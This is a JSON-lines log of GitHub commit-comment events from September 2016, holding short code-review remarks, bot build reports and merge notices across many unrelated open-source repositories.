{"id":"4557784918","type":"CommitCommentEvent","actor":{"login":"benaadams"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007430,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:36:42Z","updated_at":"2016-09-13T19:36:42Z","body":"How did it pass compile?"}},"created_at":"2016-09-13T19:36:42Z"}
{"id":"4557786745","type":"CommitCommentEvent","actor":{"login":"jbenet"},"repo":{"name":"libp2p/pubsub-notes"},"payload":{"comment":{"id":19007440,"position":null,"line":null,"path":null,"commit_id":"02443a35256fb6fb521c741009de1488c2a99448","created_at":"2016-09-13T19:37:02Z","updated_at":"2016-09-13T19:37:02Z","body":"@whyrusleeping @diasdavid pls ack here"}},"created_at":"2016-09-13T19:37:02Z"}
{"id":"4557787176","type":"CommitCommentEvent","actor":{"login":"whyrusleeping"},"repo":{"name":"libp2p/pubsub-notes"},"payload":{"comment":{"id":19007441,"position":null,"line":null,"path":null,"commit_id":"02443a35256fb6fb521c741009de1488c2a99448","created_at":"2016-09-13T19:37:09Z","updated_at":"2016-09-13T19:37:09Z","body":"ACK"}},"created_at":"2016-09-13T19:37:09Z"}
{"id":"4557788701","type":"CommitCommentEvent","actor":{"login":"ianstormtaylor"},"repo":{"name":"ianstormtaylor/slate"},"payload":{"comment":{"id":19007447,"position":null,"line":null,"path":null,"commit_id":"3ef82a3fbcf5a1408e44367440cbbc1cfcf811b7","created_at":"2016-09-13T19:37:25Z","updated_at":"2016-09-13T19:37:25Z","body":"@kommen yikes, thanks!"}},"created_at":"2016-09-13T19:37:25Z"}
{"id":"4557792232","type":"CommitCommentEvent","actor":{"login":"GiannaJo"},"repo":{"name":"nhejazi/stat215a-journal-review"},"payload":{"comment":{"id":19007460,"position":null,"line":null,"path":null,"commit_id":"8e62e1f920c60653f339201484cf23a48ef177d8","created_at":"2016-09-13T19:38:07Z","updated_at":"2016-09-13T19:38:07Z","body":"‘Number of complete’ is a little off compared with Table Two. Please let me know your opinion. "}},"created_at":"2016-09-13T19:38:07Z"}
{"id":"4557792357","type":"CommitCommentEvent","actor":{"login":"benaadams"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007461,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:38:08Z","updated_at":"2016-09-13T19:38:08Z","body":"How did it pass compile, is it not part of build? (Also ran full test suite including outerloop)"}},"created_at":"2016-09-13T19:38:08Z"}
{"id":"4557793109","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19007463,"position":37,"line":104,"path":"Updates/547_battleground_sa.sql","commit_id":"36c1592e055f6e45357b968e64b2e7b5c5ef0e70","created_at":"2016-09-13T19:38:17Z","updated_at":"2016-09-13T19:38:17Z","body":"66253 -- > shouldn't be 66243 ?"}},"created_at":"2016-09-13T19:38:17Z"}
{"id":"4557796179","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19007472,"position":41,"line":108,"path":"Updates/547_battleground_sa.sql","commit_id":"36c1592e055f6e45357b968e64b2e7b5c5ef0e70","created_at":"2016-09-13T19:38:52Z","updated_at":"2016-09-13T19:38:52Z","body":"66346 ---> shouldn't be 66246 ?"}},"created_at":"2016-09-13T19:38:52Z"}
{"id":"4557797577","type":"CommitCommentEvent","actor":{"login":"MaryMichel"},"repo":{"name":"EdisonLorgues1SD1617/Math1SD1617"},"payload":{"comment":{"id":19007476,"position":2,"line":29,"path":"Données/Cahier de textes/readme.md","commit_id":"e3d75dcb55665f92a60ac2e242482942d808807b","created_at":"2016-09-13T19:39:10Z","updated_at":"2016-09-13T19:39:10Z","body":"file:///C:/Users/Loredana/Downloads/mary47et48p38.pdf"}},"created_at":"2016-09-13T19:39:10Z"}
{"id":"4557799358","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19007479,"position":null,"line":null,"path":null,"commit_id":"36c1592e055f6e45357b968e64b2e7b5c5ef0e70","created_at":"2016-09-13T19:39:28Z","updated_at":"2016-09-13T19:39:28Z","body":"small typos in 2 places ... let's @xfurry  to fix them :) "}},"created_at":"2016-09-13T19:39:28Z"}
{"id":"4557799991","type":"CommitCommentEvent","actor":{"login":"cquammen"},"repo":{"name":"OpenChemistry/tomviz"},"payload":{"comment":{"id":19007484,"position":null,"line":null,"path":null,"commit_id":"93144e668b8997a7dce36790e7b8b3f5dd20e8b5","created_at":"2016-09-13T19:39:36Z","updated_at":"2016-09-13T19:39:36Z","body":"I figured it was something like that. And you are right, we should look out for this at other places."}},"created_at":"2016-09-13T19:39:36Z"}
{"id":"4557805934","type":"CommitCommentEvent","actor":{"login":"cjh1"},"repo":{"name":"OpenChemistry/tomviz"},"payload":{"comment":{"id":19007497,"position":null,"line":null,"path":null,"commit_id":"93144e668b8997a7dce36790e7b8b3f5dd20e8b5","created_at":"2016-09-13T19:40:43Z","updated_at":"2016-09-13T19:40:43Z","body":"I will raise an issue ..."}},"created_at":"2016-09-13T19:40:43Z"}
{"id":"4557807424","type":"CommitCommentEvent","actor":{"login":"stephentoub"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007502,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:40:58Z","updated_at":"2016-09-13T19:40:58Z","body":"Sounds like this code wasn't previously building in master; in dev/api a new build flavor was added that started building this code, highlighting the break."}},"created_at":"2016-09-13T19:40:58Z"}
{"id":"4557810129","type":"CommitCommentEvent","actor":{"login":"erniejamison"},"repo":{"name":"teamdeepblue/caissa-chess"},"payload":{"comment":{"id":19007509,"position":null,"line":null,"path":null,"commit_id":"e591c543821fa4d6d3498fa4531d37e7d57ec54f","created_at":"2016-09-13T19:41:31Z","updated_at":"2016-09-13T19:41:31Z","body":"This is a work in progress. rspec tests will have to be converted to FactoryGirl tests and the code needs refactoring.\r\n"}},"created_at":"2016-09-13T19:41:31Z"}
{"id":"4557814457","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19007520,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T19:42:19Z","updated_at":"2016-09-13T19:42:19Z","body":"yes in which case we'd just include those <script> in the client/index.html, but need to refer to this to get webpack to recognize the react imports i believe:\r\n\r\nhttps://github.com/webpack/webpack/issues/1275"}},"created_at":"2016-09-13T19:42:19Z"}
{"id":"4557818726","type":"CommitCommentEvent","actor":{"login":"jessicard"},"repo":{"name":"nplasterer/playground"},"payload":{"comment":{"id":19007533,"position":null,"line":null,"path":null,"commit_id":"5d179cd995fc3d6b41011ae03e46c99fba84ca57","created_at":"2016-09-13T19:43:08Z","updated_at":"2016-09-13T19:43:08Z","body":"A commit comment"}},"created_at":"2016-09-13T19:43:08Z"}
{"id":"4557820163","type":"CommitCommentEvent","actor":{"login":"jessicard"},"repo":{"name":"nplasterer/playground"},"payload":{"comment":{"id":19007536,"position":4,"line":4,"path":"README.md","commit_id":"5d179cd995fc3d6b41011ae03e46c99fba84ca57","created_at":"2016-09-13T19:43:23Z","updated_at":"2016-09-13T19:43:23Z","body":"A commit comment line comment"}},"created_at":"2016-09-13T19:43:23Z"}
{"id":"4557821645","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19007540,"position":33,"line":14,"path":"src/typedefs.jl","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T19:43:40Z","updated_at":"2016-09-13T19:43:40Z","body":"Using a type parameter for this would essentially have been equivalent to the old `NominalArray`/`OrdinalArray` distinction. (Actually, we could even have preserved backward compatibility using typealiases.)\r\n\r\nAs I see it, the big advantage of having a single type is that when reading data from a file or a database, marking it as ordered after the fact is very cheap, while it would have introduced type instabilities before. And I expect this to be quite frequent, since most data sources don't support the concept of an ordered categorical array.\r\n\r\nWhat kind of scenario do you have in mind for dispatching on this? Usually, unordered and ordered arrays behave the same, it's just that you raise an error for some operations on unordered arrays. Anyway, since that's an array-global property, branching on it shouldn't hurt performance (even inside a loop thanks to loop unswitching/branch prediction)."}},"created_at":"2016-09-13T19:43:40Z"}
{"id":"4557825530","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19007545,"position":102,"line":98,"path":"README.md","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T19:44:24Z","updated_at":"2016-09-13T19:44:24Z","body":"Good catch, thanks! Automated replacement is not without drawbacks..."}},"created_at":"2016-09-13T19:44:24Z"}
{"id":"4557828767","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19007552,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-13T19:45:01Z","updated_at":"2016-09-13T19:45:01Z","body":"empd_bugfix (nmerket) - x86_64-MacOS-10.9-clang: OK (2327 of 2328 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T19:45:01Z"}
{"id":"4557828816","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19007553,"position":null,"line":null,"path":null,"commit_id":"28be5976c1cfb6c4b31bb757c9dd95b172658276","created_at":"2016-09-13T19:45:01Z","updated_at":"2016-09-13T19:45:01Z","body":"r+"}},"created_at":"2016-09-13T19:45:01Z"}
{"id":"4557829488","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19007554,"position":null,"line":null,"path":null,"commit_id":"28be5976c1cfb6c4b31bb757c9dd95b172658276","created_at":"2016-09-13T19:45:11Z","updated_at":"2016-09-13T19:45:11Z","body":"saw approval from jedmccaleb\nat https://github.com/stellar/stellar-core/commit/28be5976c1cfb6c4b31bb757c9dd95b172658276"}},"created_at":"2016-09-13T19:45:11Z"}
{"id":"4557829549","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19007556,"position":null,"line":null,"path":null,"commit_id":"28be5976c1cfb6c4b31bb757c9dd95b172658276","created_at":"2016-09-13T19:45:11Z","updated_at":"2016-09-13T19:45:11Z","body":"merging stellar/stellar-core/dm/man = 28be5976 into auto"}},"created_at":"2016-09-13T19:45:11Z"}
{"id":"4557829565","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19007557,"position":null,"line":null,"path":null,"commit_id":"28be5976c1cfb6c4b31bb757c9dd95b172658276","created_at":"2016-09-13T19:45:11Z","updated_at":"2016-09-13T19:45:11Z","body":"stellar/stellar-core/dm/man = 28be5976 merged ok, testing candidate = 2eb5b651"}},"created_at":"2016-09-13T19:45:11Z"}
{"id":"4557834122","type":"CommitCommentEvent","actor":{"login":"jessicard"},"repo":{"name":"nplasterer/playground"},"payload":{"comment":{"id":19007565,"position":null,"line":null,"path":null,"commit_id":"5d179cd995fc3d6b41011ae03e46c99fba84ca57","created_at":"2016-09-13T19:45:58Z","updated_at":"2016-09-13T19:45:58Z","body":"Another commit comment"}},"created_at":"2016-09-13T19:45:58Z"}
{"id":"4557834984","type":"CommitCommentEvent","actor":{"login":"Skaronator"},"repo":{"name":"EpochModTeam/Epoch"},"payload":{"comment":{"id":19007568,"position":23,"line":31,"path":"Server_Install_Pack/sc/users/sc/sc.arma3profile","commit_id":"16ab1e613297f7c8dcf3dac076f3e4121fbe52c2","created_at":"2016-09-13T19:46:08Z","updated_at":"2016-09-13T19:46:08Z","body":"Wiki says `(0 = disabled, 1 = enabled)`\r\nhttps://community.bistudio.com/wiki/Arma_3_Difficulty_Menu"}},"created_at":"2016-09-13T19:46:08Z"}
{"id":"4557835011","type":"CommitCommentEvent","actor":{"login":"jessicard"},"repo":{"name":"nplasterer/playground"},"payload":{"comment":{"id":19007567,"position":4,"line":4,"path":"README.md","commit_id":"5d179cd995fc3d6b41011ae03e46c99fba84ca57","created_at":"2016-09-13T19:46:05Z","updated_at":"2016-09-13T19:46:05Z","body":"Another reply to a commit line comment"}},"created_at":"2016-09-13T19:46:05Z"}
{"id":"4557836527","type":"CommitCommentEvent","actor":{"login":"jessicard"},"repo":{"name":"nplasterer/playground"},"payload":{"comment":{"id":19007573,"position":7,"line":7,"path":"README.md","commit_id":"5d179cd995fc3d6b41011ae03e46c99fba84ca57","created_at":"2016-09-13T19:46:19Z","updated_at":"2016-09-13T19:46:19Z","body":"Another commit line comment"}},"created_at":"2016-09-13T19:46:19Z"}
{"id":"4557836774","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19007574,"position":51,"line":26,"path":"src/array.jl","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T19:46:27Z","updated_at":"2016-09-13T19:46:27Z","body":"I think it still segfaults, but that commit already touched too many parts of the code base, so I didn't try changing things in other unrelated areas."}},"created_at":"2016-09-13T19:46:27Z"}
{"id":"4557847426","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/flake"},"payload":{"comment":{"id":19007600,"position":20,"line":null,"path":"example/src/main/java/org/yanex/flaketest/MainActivity.kt","commit_id":"b6a5940555728865bb8ea9faa19e9552480bf61c","created_at":"2016-09-13T19:48:28Z","updated_at":"2016-09-13T19:48:28Z","body":"Hello, world!"}},"created_at":"2016-09-13T19:48:28Z"}
{"id":"4557847456","type":"CommitCommentEvent","actor":{"login":"alexander-doroshko"},"repo":{"name":"JetBrains/intellij-plugins"},"payload":{"comment":{"id":19007599,"position":14,"line":87,"path":"Dart/src/com/jetbrains/lang/dart/projectWizard/Stagehand.java","commit_id":"333396579d52dde4c7cf678b6f2bcc6e06961d60","created_at":"2016-09-13T19:48:28Z","updated_at":"2016-09-13T19:48:28Z","body":"It is `System.getProperty(\"user.name\")`, I checked that no other caller in IntelliJ code base checks it for `null`, so neither did I."}},"created_at":"2016-09-13T19:48:28Z"}
{"id":"4557854366","type":"CommitCommentEvent","actor":{"login":"phanikiranhari"},"repo":{"name":"phanikiranhari/Interview-Preparation"},"payload":{"comment":{"id":19007620,"position":null,"line":null,"path":null,"commit_id":"b1a4af3823eed60aeeb03e1dcc7d5719a07de1bf","created_at":"2016-09-13T19:49:42Z","updated_at":"2016-09-13T19:49:42Z","body":"Popular interview questions with code. \r\nThe areas that I have included are Arrays, Linked Lists, Stacks, Trees aand Strings in Java"}},"created_at":"2016-09-13T19:49:42Z"}
{"id":"4557856085","type":"CommitCommentEvent","actor":{"login":"bash"},"repo":{"name":"hipstercoders/mariadb-box"},"payload":{"comment":{"id":19007625,"position":5,"line":4,"path":"Vagrantfile","commit_id":"74384c53eac6c03a422321a0418378c8d424d964","created_at":"2016-09-13T19:50:01Z","updated_at":"2016-09-13T19:50:01Z","body":"❤️ "}},"created_at":"2016-09-13T19:50:01Z"}
{"id":"4557866540","type":"CommitCommentEvent","actor":{"login":"benaadams"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007647,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:51:50Z","updated_at":"2016-09-13T19:51:50Z","body":"Ah, new/old apis returning?"}},"created_at":"2016-09-13T19:51:50Z"}
{"id":"4557870900","type":"CommitCommentEvent","actor":{"login":"Haoyu92"},"repo":{"name":"Haoyu92/Test"},"payload":{"comment":{"id":19007657,"position":null,"line":null,"path":null,"commit_id":"3b1ad2c455eec3a0713e39ce92bdea2a9b7df5f8","created_at":"2016-09-13T19:52:38Z","updated_at":"2016-09-13T19:52:38Z","body":"hello"}},"created_at":"2016-09-13T19:52:38Z"}
{"id":"4557871532","type":"CommitCommentEvent","actor":{"login":"bubnikv"},"repo":{"name":"prusa3d/Slic3r"},"payload":{"comment":{"id":19007659,"position":23,"line":244,"path":"xs/src/libslic3r/ExtrusionEntity.cpp","commit_id":"c443f49da3e968841f43dc1f51aae189239c12d3","created_at":"2016-09-13T19:52:44Z","updated_at":"2016-09-13T19:52:44Z","body":"Joe,\n\nthe fix is about splitting a loop, which contains only a single polyline.\nThe single polyline shall have the first point repeated at the end. But\nafter the loop is split by this function, the old behavior was, there were\ntwo polylines created, while a single would be sufficient.\n\nI am not quite sure whether the old behavior causes any real world problem.\nI am working on better seams (avoid overhangs, probably more clever seam\nplacement) and I have stumbled over this issue. If I let a loop be split at\nthe closest point, the closest point will likely not be at the end points\nof an existing segment, but on the line, then this function will be called\nand some existing test case breaks. Not only that, a single loop will be\nsplit into two separate paths in the G-code.\n\nThe rest of my changes are just optimizations.\n\nFYI, I am checking my latest changes into the master branch of the Prusa3D\nrepository. I have checked in a neat EdgeGrid class, which implements a\nquite efficient signed distance field structure for querying a signed\ndistance to a contour. The EdgeGrid is used for overhang detection and I\nplan to extend it for efficient queries of the kind: \"inside which contour?\"\n\nVojtech\n\n\nOn Tue, Sep 13, 2016 at 9:10 PM, Joseph Lenox <notifications@github.com>\nwrote:\n\n> So, what was the problem with using the copy constructor here?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/prusa3d/Slic3r/commit/c443f49da3e968841f43dc1f51aae189239c12d3#commitcomment-19007107>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFj5I55hc1bYObEazhSq2D-I-ykAxyYbks5qpvU2gaJpZM4J8CA2>\n> .\n>\n"}},"created_at":"2016-09-13T19:52:44Z"}
{"id":"4557874075","type":"CommitCommentEvent","actor":{"login":"bitta"},"repo":{"name":"bitta/gitter"},"payload":{"comment":{"id":19007663,"position":4,"line":2,"path":"git.sql","commit_id":"64d079b2ee6fbcf0f7c474d6d3cc030527b8db75","created_at":"2016-09-13T19:53:12Z","updated_at":"2016-09-13T19:53:12Z","body":"comment you"}},"created_at":"2016-09-13T19:53:12Z"}
{"id":"4557885099","type":"CommitCommentEvent","actor":{"login":"rgilles"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":19007681,"position":null,"line":null,"path":null,"commit_id":"9f16090f901c30f872422f60db21a0370dde8bbf","created_at":"2016-09-13T19:55:13Z","updated_at":"2016-09-13T19:55:13Z","body":"Hi,\r\nThanks for your answer. Maybe we can use the Java reflection PR:  https://github.com/google/flatbuffers/pull/4019 to discuss about it?\r\n\r\nRomain"}},"created_at":"2016-09-13T19:55:13Z"}
{"id":"4557894468","type":"CommitCommentEvent","actor":{"login":"ahmelsayed"},"repo":{"name":"projectkudu/AzureFunctionsPortal"},"payload":{"comment":{"id":19007709,"position":null,"line":null,"path":null,"commit_id":"2e1d7a7e2dc77a4b117fcf7fa18b4b35be6c13f3","created_at":"2016-09-13T19:56:50Z","updated_at":"2016-09-13T19:56:50Z","body":"Why?"}},"created_at":"2016-09-13T19:56:50Z"}
{"id":"4557900448","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":19007725,"position":null,"line":null,"path":null,"commit_id":"0e0ca9a34d3455766ac275256c262d6768ad0660","created_at":"2016-09-13T19:57:58Z","updated_at":"2016-09-13T19:57:58Z","body":"sooo sick. can't wait to take a look."}},"created_at":"2016-09-13T19:57:58Z"}
{"id":"4557901359","type":"CommitCommentEvent","actor":{"login":"DavidObezo"},"repo":{"name":"DanyNaelson/tenis"},"payload":{"comment":{"id":19007728,"position":null,"line":null,"path":null,"commit_id":"0ab490b0d8aef1f24edc5a931d1fe5a458461383","created_at":"2016-09-13T19:58:09Z","updated_at":"2016-09-13T19:58:09Z","body":"Hi Dany. I would like to collaborate on your project"}},"created_at":"2016-09-13T19:58:09Z"}
{"id":"4557901941","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19007730,"position":null,"line":null,"path":null,"commit_id":"435257d6827bd55da891ef8e44ac1c1e0418a4f6","created_at":"2016-09-13T19:58:15Z","updated_at":"2016-09-13T19:58:15Z","body":"You should really try VS Code with merlin and https://github.com/hackwaly/vscode-ocaml. It's a whole new world."}},"created_at":"2016-09-13T19:58:15Z"}
{"id":"4557904689","type":"CommitCommentEvent","actor":{"login":"lordofhyphens"},"repo":{"name":"prusa3d/Slic3r"},"payload":{"comment":{"id":19007738,"position":23,"line":244,"path":"xs/src/libslic3r/ExtrusionEntity.cpp","commit_id":"c443f49da3e968841f43dc1f51aae189239c12d3","created_at":"2016-09-13T19:58:43Z","updated_at":"2016-09-13T19:58:43Z","body":"Mostly trying to understand the why of the changes being made so I can\nenter that into the issue/PR. I will keep this commit in a separate branch\nfor now, when your new code to make use of it is ready I can merge both\ntogether (as this would be a pre-requisite for that).\n"}},"created_at":"2016-09-13T19:58:43Z"}
{"id":"4557906154","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19007746,"position":19,"line":139,"path":"examples/experimental/persistent-volume-provisioning/README.md","commit_id":"5445ccf4cbc8aa5794e125f1b66dcc16ae4a9572","created_at":"2016-09-13T19:58:59Z","updated_at":"2016-09-13T19:58:59Z","body":"@elsonrodriguez is working on a doc refactoring #32459 "}},"created_at":"2016-09-13T19:58:59Z"}
{"id":"4557906637","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19007749,"position":null,"line":null,"path":null,"commit_id":"714779815a9c79d348c28c4a6be86eabd6dfe694","created_at":"2016-09-13T19:59:08Z","updated_at":"2016-09-13T19:59:08Z","body":"All of these were needed for our 'sample' data. So we really need to look into them (especially the last one where I add 0x10000 to that out buffer).  The last one was crashing getting the salt->p item in line 1242\r\n\r\nSeeing that 'p' can be that large, it looks like p can be 'data size', so having fixed sized buffers might not be OK for any of the p,q,g,y,x,n,d variables "}},"created_at":"2016-09-13T19:59:08Z"}
{"id":"4557908016","type":"CommitCommentEvent","actor":{"login":"fashaikh"},"repo":{"name":"projectkudu/AzureFunctionsPortal"},"payload":{"comment":{"id":19007756,"position":null,"line":null,"path":null,"commit_id":"2e1d7a7e2dc77a4b117fcf7fa18b4b35be6c13f3","created_at":"2016-09-13T19:59:23Z","updated_at":"2016-09-13T19:59:23Z","body":"Livestream is  not supported today with scm credentials. And plans to support scm auth are on the backburner for now until GA work items are worked on ."}},"created_at":"2016-09-13T19:59:23Z"}
{"id":"4557908021","type":"CommitCommentEvent","actor":{"login":"ggirard07"},"repo":{"name":"MvvmCross/MvvmCross-AndroidSupport"},"payload":{"comment":{"id":19007757,"position":null,"line":null,"path":null,"commit_id":"cca17aac31dfba5c202211d14a3ace5c1312dfdf","created_at":"2016-09-13T19:59:23Z","updated_at":"2016-09-13T19:59:23Z","body":"Hi @martijn00 , do you have any reference to the bug you fixed there by using [`this.RetainInstance = true;`](https://github.com/MvvmCross/MvvmCross-AndroidSupport/commit/cca17aac31dfba5c202211d14a3ace5c1312dfdf#diff-34dcd07c9129db6eb1396036ae401735R27)?\r\nI am trying to figure it out if we still need this hack or not :)"}},"created_at":"2016-09-13T19:59:23Z"}
{"id":"4557908065","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19007758,"position":null,"line":null,"path":null,"commit_id":"5c712cc4ce9a8a59e97cc6c838518a3829594e4a","created_at":"2016-09-13T19:59:24Z","updated_at":"2016-09-13T19:59:24Z","body":"Then they realize that they are free to continue because I captured both Arfectas."}},"created_at":"2016-09-13T19:59:24Z"}
{"id":"4557908365","type":"CommitCommentEvent","actor":{"login":"drewnoakes"},"repo":{"name":"drewnoakes/metadata-extractor-images"},"payload":{"comment":{"id":19007760,"position":33,"line":33,"path":"jpg/metadata/Reconyx HC500 firmware 3.3.0.jpg.txt","commit_id":"f88f174def10383975bcbb6435b48682c87571f5","created_at":"2016-09-13T19:59:27Z","updated_at":"2016-09-13T19:59:27Z","body":"Never would have guessed we'd end up with lunar metadata :)"}},"created_at":"2016-09-13T19:59:27Z"}
{"id":"4553010539","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18994991,"position":52,"line":283,"path":"src/sdl/utils.cpp","commit_id":"c4497595bae651964b2677d88764224ad4043490","created_at":"2016-09-13T02:03:13Z","updated_at":"2016-09-13T02:03:13Z","body":"Don't be too fast to remove temporary surfaces."}},"created_at":"2016-09-13T02:03:13Z"}
{"id":"4553013164","type":"CommitCommentEvent","actor":{"login":"BaeHJin"},"repo":{"name":"hanbit-java001/hyoungjin.bae"},"payload":{"comment":{"id":18994998,"position":null,"line":null,"path":null,"commit_id":"47ba897a76bb0b5f3b2d98f0f90e961a9304468b","created_at":"2016-09-13T02:04:06Z","updated_at":"2016-09-13T02:04:06Z","body":"connection, execute 따로 구현/ service에 추가"}},"created_at":"2016-09-13T02:04:06Z"}
{"id":"4553017804","type":"CommitCommentEvent","actor":{"login":"bdash"},"repo":{"name":"realm/realm-cocoa"},"payload":{"comment":{"id":18995067,"position":26,"line":67,"path":"docs/swift-3-api.diff","commit_id":"40d0210c4bde1e1d1af43a259af02c81c1721113","created_at":"2016-09-13T02:05:33Z","updated_at":"2016-09-13T02:05:33Z","body":"I think this label should be more than `by` since the type doesn't communicate the meaning of the argument. `byProperty` or `byKeyPath`, depending on how forward-thinking we want to be."}},"created_at":"2016-09-13T02:05:33Z"}
{"id":"4553017858","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18995068,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-13T02:05:34Z","updated_at":"2016-09-13T02:05:34Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2335 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T02:05:34Z"}
{"id":"4553019182","type":"CommitCommentEvent","actor":{"login":"bdash"},"repo":{"name":"realm/realm-cocoa"},"payload":{"comment":{"id":18995074,"position":31,"line":72,"path":"docs/swift-3-api.diff","commit_id":"40d0210c4bde1e1d1af43a259af02c81c1721113","created_at":"2016-09-13T02:06:04Z","updated_at":"2016-09-13T02:06:04Z","body":"Ditto about `of` being insufficient, for similar reasons as for `sorted` above."}},"created_at":"2016-09-13T02:06:04Z"}
{"id":"4553019225","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"dmalan/tmp"},"payload":{"comment":{"id":18995075,"position":null,"line":null,"path":null,"commit_id":"5d965de30fdd5cfb90eabb2ce887f504585267d5","created_at":"2016-09-13T02:06:06Z","updated_at":"2016-09-13T02:06:06Z","body":"test comments"}},"created_at":"2016-09-13T02:06:06Z"}
{"id":"4553019412","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"dmalan/tmp"},"payload":{"comment":{"id":18995076,"position":1,"line":1,"path":"mario.c","commit_id":"5d965de30fdd5cfb90eabb2ce887f504585267d5","created_at":"2016-09-13T02:06:10Z","updated_at":"2016-09-13T02:06:10Z","body":"test line comment"}},"created_at":"2016-09-13T02:06:10Z"}
